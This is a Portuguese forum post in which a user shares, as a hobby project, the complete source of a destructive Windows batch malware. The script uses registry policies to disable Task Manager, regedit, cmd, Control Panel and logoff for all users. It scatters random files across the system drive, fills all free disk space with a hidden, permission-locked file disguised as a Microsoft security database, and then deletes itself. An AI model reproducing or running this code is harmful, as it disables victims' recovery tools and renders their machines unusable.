Tweet
Boa noite pessoal, hj como estava sem nada para fazer, resolvi criar um malware pequeno em .bat
Bom, o que ele faz:
*Desabilita vários componentes do sistema operacional (painel de controle, cmd, regedit, etc...)
*Gera arquivos de nome aleatorio em todas as pastas do sistema operacional
*Cria um "dummy" que consome todo o espaço vazio do hd
Segue o codigo fonte :
Obrigado e até mais,
Desantao
Bom, o que ele faz:
*Desabilita vários componentes do sistema operacional (painel de controle, cmd, regedit, etc...)
*Gera arquivos de nome aleatorio em todas as pastas do sistema operacional
*Cria um "dummy" que consome todo o espaço vazio do hd
Segue o codigo fonte :
Código PHP:
@Echo OFF
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2>&1
FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do (
tar)
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1
reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1
)
setlocal enabledelayedexpansion
Set File=0
For /F "Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@)
Goto :Dummy
:Copy
Fsutil file createnew "%*\%Random%%Random%%Random%%Random%%Random%" 1 >NUL 2>&1
Set /A File+=1
If !FILE! EQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*)
:DUMMY
Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
Set Size=%%f
Set Size=!Size:~-0,-6!
Set Size=!Size!000000
Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
)
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1
:FIN
Del /Q %0
Exit
Desantao
Comment